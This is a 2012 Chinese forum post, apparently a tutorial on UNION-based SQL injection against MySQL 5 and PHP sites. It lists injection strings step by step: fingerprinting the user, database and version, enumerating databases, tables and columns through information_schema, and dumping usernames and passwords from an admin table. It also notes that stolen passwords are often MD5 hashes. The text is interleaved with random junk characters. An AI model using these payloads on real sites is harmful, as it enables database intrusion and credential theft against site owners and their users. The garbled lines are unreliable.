5 S& V: p) Y- M* K' D
教程内容:Mysql 5+php 注入
! ?7 H' M, r5 W+ K8 J: \5 x1 V
+ A: O% P9 n( U" V3 X/ S' N; k$ j. V
& G8 V" N4 g/ Y一.查看MYSQL基本信息(库名,版本,用户)
1 D8 D. B( G w; w) f: q! X H' i0 w
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
0 c/ R' m+ ^( c. `' q2 v8 R: u
4 V. n* Y. j4 B& ~ m二.查数据库- p U0 j! @# s. U3 Z; c
: t2 S" W ~( N jand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
- m# Y3 V; A9 o$ H8 g$ c G$ P9 Klimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。# N. N. A5 w" w: ~ J& d
1 h" ~4 W0 o8 G9 x, Z3 g* \三.暴表
4 _1 [0 H* ^ `3 x# u( r
6 r* D, ~! P0 U& D- z9 oand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
0 Y/ I# s* k$ N. W9 ~) c8 K4 i+ @ {( G) ~9 [- U3 B' {3 v
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。9 m; E3 J/ @! J
5 n# G. ?) Q& O: ?8 C2 R6 S四.暴字段
3 N* _+ H; X# b1 S" h
+ i6 U* h- k u% X* o* D- U) Cand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
' o5 n- e; t* S* M$ b6 s" L1 A8 Y, s7 w- K3 F" N; A: \- ?5 u
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
. @9 A2 ^' Q8 A' }
; Q+ `5 h/ U+ Z9 l+ D! R0 j五.暴数据" }7 H/ o% _9 `- ^
0 i3 j) F: B/ B, O+ Band 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
* D5 ]) e4 w1 F4 y0 O2 u9 P: L0 k3 u& m2 y8 T. f S( }+ Q
7 n% \' ]: i# D9 Z4 L5 T这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。# m" K6 E+ u/ i. v) K1 d1 x @7 ]2 b
|
发表于 2012-9-13 16:27:53
收藏
支持
反对